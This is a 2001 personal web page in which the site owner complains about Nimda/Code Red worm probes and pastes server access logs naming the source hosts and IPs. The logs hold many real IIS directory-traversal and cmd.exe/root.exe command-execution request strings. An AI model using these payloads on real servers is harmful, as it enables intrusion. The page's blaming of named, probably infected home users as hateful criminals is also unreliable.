Site under virus hack attack: Code Red Nimda at SALIU.COM!

This Site Is Under Hack Attack: Code Red/ Nimda Virus

Acts Of Hostility Against SALIU.COM

Site under virus hack attack: Code Red Nimda.

Written by Ion Saliu on November 11, 2001.

• My website has been under a serious attack in the past weeks. It appears to be a Nimda / Code Red virus attack. I complained to some of the respective ISPs where the attacks originated. Some responded, others haven't. I make the addresses public, so that other Internet users are aware of such despicable acts. The number of attacks last week: 271. If you know some of the end-users of the attacks, don't hesitate to express your opinions. Some of the attacks are extremely vicious: several times a day, every day, every week. This is the case for the address:
mil-static-ws-24.dsl.airstreamcomm.net
(from Milltown, Australia)

What the bastards are doing is not freedom of speech. It is CRIME. The law enforcement all over the world treats such acts as crimes. Such acts are punished as crimes. Their perpetrators are treated as criminals.
The source of those crimes is HATRED. Forget about freedom of speech. The acts are the result of lowly hatred. And the goal is to silence another human. What a futile purpose! If it wasn't me this time, there will be other persons with similar ideas and actions such as mine. Humans do not create ideas. Humans only come across ideas. For the ideas have always been out there. They express relations, and laws, and formulae of the eternal Number. Humans will come across such relations at various points in time. Always! In spite of all mental viruses in the world!

(Toronto, Canada)
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:16:21 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:16:30 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:16:39 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:16:48 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:16:57 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-" hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:17:06 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:17:15 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:17:24 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:17:33 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:17:42 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:17:51 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:18:00 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"

64.150.128.150 - - [04/Nov/2001:04:19:08 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:08 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:09 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:09 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:09 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:10 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:10 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:11 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:11 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:11 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:12 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:15 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:16 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:16 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:16 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:17 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"

dsl081-157-211.chi1.dsl.speakeasy.net - - [05/Nov/2001:02:05:08 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

dsl-6414820487.internetconnect.net - - [05/Nov/2001:18:50:27 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
dsl-6414820487.internetconnect.net - - [05/Nov/2001:18:50:27 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

Block 64.221.119.238 assigned to:
Concentric Network Corporation (NETBLK-CNCX-BLK-6)
1400 Parkmoor Avenue
San Jose, CA 95126-3429
64.221.119.238 - - [05/Nov/2001:20:46:23 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.221.119.238 - - [05/Nov/2001:20:46:23 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

dsl-64-130-20-225.telocity.com - - [06/Nov/2001:07:01:15 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
dsl-64-130-20-225.telocity.com - - [06/Nov/2001:07:01:15 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

mail.royalglassco.com - - [06/Nov/2001:07:04:31 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
dnai-216-15-72-109.cust.dnai.com - - [06/Nov/2001:07:04:31 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
dnai-216-15-72-109.cust.dnai.com - - [06/Nov/2001:07:04:31 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
dnai-216-15-72-109.cust.dnai.com - - [06/Nov/2001:07:04:31 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mail.royalglassco.com - - [06/Nov/2001:07:04:32 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

64-214-146-187.roc.frontiernet.net - - [06/Nov/2001:19:01:52 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64-214-146-187.roc.frontiernet.net - - [06/Nov/2001:19:01:53 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

Concentric Network Corporation (NETBLK-CNCX-BLK-6)
1400 Parkmoor Avenue
San Jose, CA 95126-3429
64.221.49.143 - - [06/Nov/2001:19:34:40 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.221.49.143 - - [06/Nov/2001:19:34:40 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

unknown.level3.net - - [06/Nov/2001:20:01:53 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
unknown.level3.net - - [06/Nov/2001:20:01:53 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

cust.64-52-88.194.ip.lax.ebrb.net - - [06/Nov/2001:21:42:54 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
cust.64-52-88.194.ip.lax.ebrb.net - - [06/Nov/2001:21:43:03 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

w214.z064001128.chi-il.dsl.cnc.net - - [06/Nov/2001:22:21:25 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
w214.z064001128.chi-il.dsl.cnc.net - - [06/Nov/2001:22:21:26 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

Pac Bell Internet Services (NETBLK-PBI-NET-8) PBI-NET-8
Main Way (NETBLK-SBCIS-101424-17188) SBCIS-101424-17188
64.174.183.150 - - [07/Nov/2001:00:26:21 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.174.183.150 - - [07/Nov/2001:00:26:21 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

64.164.28.169 - - [08/Nov/2001:05:07:10 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.164.28.169 - - [08/Nov/2001:05:07:10 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

mil-static-ws-24.dsl.airstreamcomm.net - - [09/Nov/2001:19:30:36 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [09/Nov/2001:19:30:42 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

Concentric Network Corporation (NETBLK-CNCX-BLK-6)
1400 Parkmoor Avenue
San Jose, CA 95126-3429
64.221.31.74 - - [09/Nov/2001:19:35:01 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.221.31.74 - - [09/Nov/2001:19:35:01 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

64.83.37.200.dsl200-static-nova.cavtel.net - - [10/Nov/2001:10:05:48 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.83.37.200.dsl200-static-nova.cavtel.net - - [10/Nov/2001:10:05:48 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

adsl-66-121-56-74.dsl.lsan03.pacbell.net - - [10/Nov/2001:22:24:18 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
adsl-66-121-56-74.dsl.lsan03.pacbell.net - - [10/Nov/2001:22:24:19 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

alhu9ewy171e.bc.hsia.telus.net - - [11/Nov/2001:07:21:54 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
alhu9ewy171e.bc.hsia.telus.net - - [11/Nov/2001:07:21:54 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:37 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:38 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:39 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:40 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:41 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:42 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:43 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:44 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:45 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:46 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:47 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:48 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:49 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:50 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
...

(Rice Lake, Wisconsin, USA)
ricelakeonline.com - - [12/Nov/2001:13:08:53 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
ricelakeonline.com - - [12/Nov/2001:13:08:53 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
ricelakeonline.com - - [12/Nov/2001:13:08:54 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

user-64-112-182-10.noc.uswo.net - - [13/Nov/2001:03:54:39 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
user-64-112-182-10.noc.uswo.net - - [13/Nov/2001:03:54:40 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
user-64-112-182-10.noc.uswo.net - - [13/Nov/2001:03:54:40 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
user-64-112-182-10.noc.uswo.net - - [13/Nov/2001:03:54:40 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

They started to run from one domain to another.
“You can run, but you can't hide!”

Ion Saliu

Site under virus hack attack: Code Red Nimda!

Web Site under virus hack attack: Code Red Nimda.

Virus attacks, hack-attack.

| Home | Search | New Writings | Odds, Generator | Contents | Forums | Sitemap |

Computer virus attacks to intimidate, disrupt, silence ideas over the Internet.